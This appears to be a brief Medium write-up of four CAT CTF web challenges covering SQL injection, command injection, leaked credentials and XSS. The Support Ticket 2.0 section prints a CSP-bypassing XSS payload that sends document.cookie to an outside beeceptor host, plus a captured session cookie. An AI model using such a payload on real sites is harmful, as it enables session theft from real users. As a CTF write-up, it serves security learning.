CAT CTF.ae-Write-up

Let’s go solving the web challenge…

1 - Challenge Name : Admin Panel

Admin Panel
user and pass = Guest_101
Welcome Guest!
cookies
i will try SQL injection
alert (Forbidden)
it is SQL injection
log is with SQL injection
alert Includes flag

2 - Challenge Name : Greeting Generator

Greeting Generator
command injection
The resulting for command injection
command injection
The resulting for new command injection

3 - Challenge Name : Sorry Wilson

Sorry Wilson
Unknown username and password
README.md
user: forest.jenny :: password: P@ssw0rd!
uid=f.captin
uid=f.captin

4 - Challenge Name : Support Ticket 2.0

Support Ticket 2.0
xss payload
xss payload is work
CSP Evaluater
the trusted sources to load and execute java script

”><script src=”https://accounts.google.com/o/oauth2/revoke?callback=alert(document.cookie)"></script>

<script src=”//accounts.google.com/o/oauth2/revoke?callback=eval(document.location=’https://Ahmed.free.beeceptor.com'.concat(document.cookie))"></script>

cookie=session=s%3A6PZYod9n7ENwZ7iDudPtgBkEd6MJstV8.WyFSMUj13Kf6j3Fnk8mIk1MN%2FLhaElmE%2FN16Q%2FPJhH4

403 — Permission denied. Not admin!

End the web challenge…… I solve it :)

I would like to thank my new team for help my to solve challenges

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Magdy

Ahmed Magdy

Interested in infosec || CTF Player || Pentester || Bug Hunter || Security Researcher